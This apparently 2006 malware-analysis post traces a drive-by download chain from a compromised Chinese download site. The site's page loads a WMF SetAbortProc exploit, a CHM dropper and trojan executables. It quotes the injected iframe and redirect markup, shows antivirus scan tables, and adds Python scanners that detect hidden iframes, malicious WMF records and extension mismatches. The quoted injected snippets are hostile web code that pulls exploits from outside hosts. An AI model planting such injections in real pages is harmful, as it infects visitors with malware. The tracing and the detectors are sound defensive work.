Original work by endurer
2006-05-10, 1st edition
The code of the website hxxp://www.***23down.cn contains:
〈frame name="header" scrolling="no" noresize target="main" src="top.htm"〉
The code of hxxp://www.***23down.cn/top.htm contains:
〈script language="javascript" type="text/javascript" src="hxxp://js.***a.dx03.51.la/1707.js"〉〈/script〉
〈script language=javascript src=hxxp://www.***475100.com/1.js〉〈/script〉
The code of hxxp://www.***475100.com/1.js contains:
document.writeln("〈iframe id=\"baidufttrame\" border=\"0\" vspace=\"0\" hspace=\"0\" marginwidth=\"0\" marginheight=\"0\" framespacing=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"0\" height=\"0\" src=\"http:\/\/www.***475100.com\/bd\/index.htm\"〉〈\/iframe〉")
The code of hxxp://www.***475100.com/bd/index.htm:
〈iframe height="0" width="0" src="hxxp://www.***475100.com/mm.wmf"〉〈/iframe〉
〈iframe height="0" width="0" src="hxxp://www.***475100.com/bd/icyfox.htm"〉〈/iframe〉
〈iframe height="0" width="0" src="hxxp://www.***475100.com/xx/"〉〈/iframe〉
〈iframe src="mm.html" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
〈iframe src="joke.htm" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
〈iframe src="免费色情电影播放器.exe" name="zhu" width="0" height="0" frameborder="0"〉〈/iframe〉
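As an added example that is not part of the original post, the following Python scanner extracts the iframes from a page, including ones a script emits through document.writeln("...") as 1.js does above, and reports the zero-size ones that carry the chain. The sample HTML, the domains dropper.example and victim.example and all function names are constructed for the example.

```python
# Added example (not from the original post): find zero-size <iframe>s, including
# ones a page writes from JavaScript via document.write/writeln("..."), as 1.js does.
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Escapes used inside the writeln() string payload: \"  \/  \'
_JS_ESCAPES = {'\\"': '"', "\\/": "/", "\\'": "'"}

# document.write("...") / document.writeln('...'); escaped quotes allowed inside
_WRITE_CALL = re.compile(
    r"""document\.write(?:ln)?\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)""", re.S)

def unescape_js_string(s: str) -> str:
    """Undo the JS string escapes so the embedded HTML can be parsed."""
    for esc, plain in _JS_ESCAPES.items():
        s = s.replace(esc, plain)
    return s

class _Collector(HTMLParser):
    """Collect <iframe> attribute dicts and the bodies of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def _dimension(value):
    """Parse width/height like '0', '0px', ' 300 '; None when absent or non-numeric."""
    if value is None:
        return None
    try:
        return float(str(value).strip().rstrip("px").strip())
    except ValueError:
        return None

def is_hidden_size(attrs) -> bool:
    """True when the frame is declared with zero width or zero height."""
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    return (w is not None and w <= 0) or (h is not None and h <= 0)

def find_hidden_iframes(html: str, base_url: str):
    """Absolute src URLs of zero-size iframes, from the markup itself and from
    HTML strings passed to inline document.write/writeln calls."""
    page = _Collector()
    page.feed(html)
    frames = list(page.iframes)
    for _quote, payload in _WRITE_CALL.findall("\n".join(page.scripts)):
        inner = _Collector()
        inner.feed(unescape_js_string(payload))
        frames.extend(inner.iframes)
    return [urljoin(base_url, a["src"]) for a in frames
            if a.get("src") and is_hidden_size(a)]

# Constructed sample page mirroring the structure seen above (fake hosts).
SAMPLE_HTML = """<html><body>
<iframe src="visible.htm" width="300" height="200"></iframe>
<script language=javascript>
document.writeln("<iframe id=\\"f1\\" frameborder=\\"0\\" width=\\"0\\" height=\\"0\\" src=\\"http:\\/\\/dropper.example\\/bd\\/index.htm\\"><\\/iframe>")
</script>
<iframe height="0" width="0" src="mm.wmf"></iframe>
</body></html>"""

if __name__ == "__main__":
    for url in find_hidden_iframes(SAMPLE_HTML, "http://victim.example/bd/index.htm"):
        print("hidden iframe ->", url)
```

Each URL the scanner returns is the next page to fetch and inspect; running it again on every fetched page walks the redirection chain the post traces by hand.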
mm.wmf is detected by Jiangmin KV (江民KV) as: Exploit.WMF.SetAbortProc
Complete scanning result of "mm.wmf", received in VirusTotal at 05.10.2006, 16:03:09 (CET).

Antivirus          | Version        | Update     | Result
-------------------|----------------|------------|---------------------------------------------
AntiVir            | 6.34.1.27      | 05.10.2006 | EXP/MS06-001.WMF
Avast              | 4.6.695.0      | 05.10.2006 | MS06-001 WMF Exploit
AVG                | 386            | 05.09.2006 | May be infected by unknown virus Exploit.WMF
BitDefender        | 7.2            | 05.10.2006 | Exploit.Win32.WMF-PFV
CAT-QuickHeal      | 8.00           | 05.09.2006 | WMF.Exploit
ClamAV             | devel-20060426 | 05.10.2006 | Exploit.WMF.A
DrWeb              | 4.33           | 05.10.2006 | Exploit.MS05-053
eTrust-InoculateIT | 23.72.4        | 05.10.2006 | Win32/Worfo.Variant!Trojan
eTrust-Vet         | 12.4.2203      | 05.10.2006 | Win32/Worfo
Ewido              | 3.5            | 05.10.2006 | Exploit.MS05-053-WMF
Fortinet           | 2.76.0.0       | 05.10.2006 | suspicious
F-Prot             | 3.16c          | 05.09.2006 | no virus found
Ikarus             | 0.2.65.0       | 05.10.2006 | Exploit.IMG-WMF
Kaspersky          | 4.0.2.24       | 05.10.2006 | Exploit.Win32.IMG-WMF.u
McAfee             | 4758           | 05.09.2006 | Exploit-WMF
Microsoft          | 1.1372         | 05.10.2006 | TrojanDownloader:Win32/Wmfpfv
NOD32v2            | 1.1529         | 05.10.2006 | a variant of Win32/Exploit.WMF
Norman             | 5.90.17        | 05.10.2006 | W32/Exploit.Gen
Panda              | 9.0.0.4        | 05.10.2006 | Exploit/Metafile
Sophos             | 4.05.0         | 05.10.2006 | Exp/WMF-A
Symantec           | 8.0            | 05.10.2006 | Trojan.Ducky.B
TheHacker          | 5.9.7.141      | 05.10.2006 | Exploit/WMF
UNA                | 1.83           | 05.06.2006 | Exploit.WMF.IMG
VBA32              | 3.11.0         | 05.09.2006 | Exploit.WMF

Additional Information
File size: 17253 bytes
MD5: eeab0824a7a4e53dabddfc019501e5f5
SHA1: fce0693db77cb47025e707f682d9df33ab752f12
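The detection names above all point at the same construct: a META_ESCAPE record carrying the SETABORTPROC escape, which is what MS06-001 patched. As an added example that is not part of the original post, the following Python checker walks the WMF record stream and reports any such record, handling the optional placeable header and truncated files. The fixture files, record builders and function names are constructed for the example; the two fixtures contain only record headers and no payload.

```python
# Added example (not from the original post): flag WMF files that contain a
# META_ESCAPE record whose escape function is SETABORTPROC (the MS06-001 trigger).
import struct

PLACEABLE_KEY = 0x9AC6CDD7   # magic of the optional 22-byte placeable header
META_EOF = 0x0000
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009        # escape function number carried in the first parameter

def wmf_records(data: bytes):
    """Yield (offset, function, params) for each record in a WMF blob.
    Stops at META_EOF, at a malformed record size, or when the file is truncated."""
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                                    # skip the placeable header
    if len(data) < off + 18:
        return                                      # no room for META_HEADER
    header_words = struct.unpack_from("<H", data, off + 2)[0]   # normally 9 (18 bytes)
    off += header_words * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)  # RecordSize in WORDs
        size = size_words * 2
        if size < 6 or off + size > len(data):
            return                                  # malformed or truncated record
        yield off, func, data[off + 6:off + size]
        if func == META_EOF:
            return
        off += size

def find_setabortproc(data: bytes):
    """Offsets of META_ESCAPE records whose escape function is SETABORTPROC."""
    hits = []
    for off, func, params in wmf_records(data):
        if (func == META_ESCAPE and len(params) >= 2
                and struct.unpack_from("<H", params, 0)[0] == SETABORTPROC):
            hits.append(off)
    return hits

# --- constructed fixtures: record structure only, no payload bytes ---
def _record(func: int, params: bytes = b"") -> bytes:
    if len(params) % 2:
        params += b"\x00"                           # records are WORD aligned
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params

def _wmf(records, placeable: bool = False) -> bytes:
    body = b"".join(records)
    max_words = max(len(r) for r in records) // 2
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0, max_words, 0)
    prefix = (struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0)
              if placeable else b"")
    return prefix + header + body

BENIGN_WMF = _wmf([_record(0x0103, struct.pack("<H", 8)),          # META_SETMAPMODE
                   _record(META_EOF)])
FLAGGED_WMF = _wmf([_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 0)),
                    _record(META_EOF)], placeable=True)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WMF), ("flagged", FLAGGED_WMF)):
        print(name, "->", find_setabortproc(blob) or "clean")
```

Scanning for the record rather than for a specific byte sequence is what lets the check survive the re-encoding tricks that made several engines above miss or mislabel the file; on a mail gateway or proxy it is also cheap enough to run on every image with a WMF magic regardless of its extension.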
icyfox.htm is detected by Jiangmin KV as: Exploit.MHtRedir
icyfox.htm downloads and runs icyfox.js
icyfox.js is actually a CHM file; it drops and runs an EXE file. Jiangmin KV's virus database of 2006-05-10 cannot detect it.
Complete scanning result of "icyfox.js", received in VirusTotal at 05.10.2006, 16:18:28 (CET).

Antivirus          | Version        | Update     | Result
-------------------|----------------|------------|----------------------------------
AntiVir            | 6.34.1.27      | 05.10.2006 | TR/Dldr.Small.TZ.49
Avast              | 4.6.695.0      | 05.10.2006 | Win32:Trojano-3583
AVG                | 386            | 05.09.2006 | no virus found
BitDefender        | 7.2            | 05.10.2006 | Trojan.Downloader.Small.NB
CAT-QuickHeal      | 8.00           | 05.09.2006 | TrojanDownloader.Small.tz
ClamAV             | devel-20060426 | 05.10.2006 | no virus found
DrWeb              | 4.33           | 05.10.2006 | Trojan.DownLoader.2791
eTrust-InoculateIT | 23.72.4        | 05.10.2006 | Win32/SillyDL.7fl!Trojan
eTrust-Vet         | 12.4.2203      | 05.10.2006 | no virus found
Ewido              | 3.5            | 05.10.2006 | no virus found
Fortinet           | 2.76.0.0       | 05.10.2006 | no virus found
F-Prot             | 3.16c          | 05.09.2006 | no virus found
Ikarus             | 0.2.65.0       | 05.10.2006 | no virus found
Kaspersky          | 4.0.2.24       | 05.10.2006 | Trojan-Downloader.Win32.Small.tz
McAfee             | 4758           | 05.09.2006 | Exploit-CodeBase.chm
Microsoft          | 1.1372         | 05.10.2006 | TrojanDownloader:Win32/Small!3817
NOD32v2            | 1.1529         | 05.10.2006 | Win32/TrojanDownloader.Small.TZ
Norman             | 5.90.17        | 05.10.2006 | no virus found
Panda              | 9.0.0.4        | 05.10.2006 | Suspicious file
Sophos             | 4.05.0         | 05.10.2006 | Troj/Small-BDM
Symantec           | 8.0            | 05.10.2006 | no virus found
TheHacker          | 5.9.7.141      | 05.10.2006 | no virus found
UNA                | 1.83           | 05.06.2006 | no virus found
VBA32              | 3.11.0         | 05.09.2006 | Trojan-Downloader.Win32.Small.tz

Additional Information
File size: 9676 bytes
MD5: 2f3c8d0f3c5cc12cc221c78701811517
SHA1: 98b848f95f2319369837e0a7fb4d4c48dd6e59dd
joke.htm is detected by Jiangmin KV as: Exploit.VBS.Phel.bc
免费色情电影播放器.exe (the file name reads "free adult movie player") contains three files:
lsasss.exe is detected by Jiangmin KV as: Trojan/VB.Small.bi
QQ.Exe is detected by Jiangmin KV as: TrojanDownloader.MiniQrz
hy.exe is detected by Jiangmin KV as: TrojanDownloader.MiniQrz
The code of hxxp://www.***475100.com/xx/ is:
〈script language=javascript〉ie='wxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='wnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉
Depending on the Windows and IE version reported in navigator.appVersion, it loads wxp.htm, wnt.htm or w98.htm accordingly.
The contents of wxp.htm, wnt.htm and w98.htm are obfuscated with Encode() and Escape(); they download/run:
1) hxxp://www.***475100.com/xx//dongfang.gif
dongfang.gif is a script obfuscated with eval().
2) opens hxxp://www.***5173a.com/door/index.htm
The contents of hxxp://www.***5173a.com/door/index.htm are:
〈script language=javascript〉ie='winxp';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';〈/script〉
〈script src='http://s37.cnzz.com/stat.php?id=121168&web_id=121168' language='JavaScript' charset='gb2312'〉〈/script〉
Depending on the Windows and IE version reported in navigator.appVersion, it loads winxp.htm, winnt.htm or w98.htm accordingly.
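Two of the files in this chain are served under an extension that lies about their content: icyfox.js is a CHM archive and dongfang.gif is a script. As an added example that is not part of the original post, the following Python check compares the type implied by a file's extension with the type read from its leading bytes and reports the disagreements; it generalises beyond the two cases here to the other formats the chain uses (WMF, EXE). The magic lists, the sample inputs and all function names are constructed for the example.

```python
# Added example (not from the original post): report files whose content type,
# judged from the leading bytes, contradicts the extension they are served under.
import re

# (magic prefix, kind) pairs; first match wins
MAGICS = [
    (b"ITSF", "chm"),                       # compiled HTML help, as icyfox.js turned out to be
    (b"GIF87a", "gif"), (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"MZ", "exe"),
    (b"\xd7\xcd\xc6\x9a", "wmf"),           # placeable WMF header
    (b"\x01\x00\x09\x00", "wmf"), (b"\x02\x00\x09\x00", "wmf"),   # bare WMF header
]
# what each extension is expected to contain
EXT_KIND = {"chm": "chm", "gif": "gif", "png": "png", "jpg": "jpeg", "jpeg": "jpeg",
            "exe": "exe", "wmf": "wmf", "js": "script", "vbs": "script",
            "htm": "html", "html": "html"}
_HTML_START = re.compile(rb"\s*<(!doctype|html|head|body|frameset|frame|iframe|script)\b", re.I)
_SCRIPT_HINT = re.compile(rb"\b(eval|unescape|execScript|document\.write(ln)?)\s*\(", re.I)

def classify(data: bytes) -> str:
    """Kind of content from the first bytes: a known magic, html, script, text or binary."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    head = data[:4096]
    if _HTML_START.match(head):
        return "html"
    if _SCRIPT_HINT.search(head):
        return "script"
    try:
        head.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "binary"

def mismatch(filename: str, data: bytes):
    """(expected, actual) when the extension and the content disagree, else None.
    Files with an extension we have no expectation for are not judged."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = EXT_KIND.get(ext)
    if expected is None:
        return None
    actual = classify(data)
    return None if actual == expected else (expected, actual)

def scan(items):
    """items: iterable of (filename, bytes). Returns [(filename, expected, actual), ...]."""
    findings = []
    for name, data in items:
        result = mismatch(name, data)
        if result:
            findings.append((name, *result))
    return findings

# Constructed samples shaped like the files discussed above (no real payloads).
SAMPLES = [
    ("icyfox.js", b"ITSF\x03\x00\x00\x00" + b"\x00" * 32),
    ("dongfang.gif", b"eval(unescape('%61%6c%65%72%74'))"),
    ("logo.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00"),
    ("mm.wmf", b"\xd7\xcd\xc6\x9a" + b"\x00" * 18),
    ("index.htm", b"<script language=javascript>ie='wxp';</script>"),
]

if __name__ == "__main__":
    for name, expected, actual in scan(SAMPLES):
        print(f"{name}: extension says {expected}, content looks like {actual}")
```

The check is meant to run on what a proxy or sandbox actually fetched, not on the URL alone: the chain above relies on the browser and the user ignoring the extension, so the byte-level type is the only trustworthy signal.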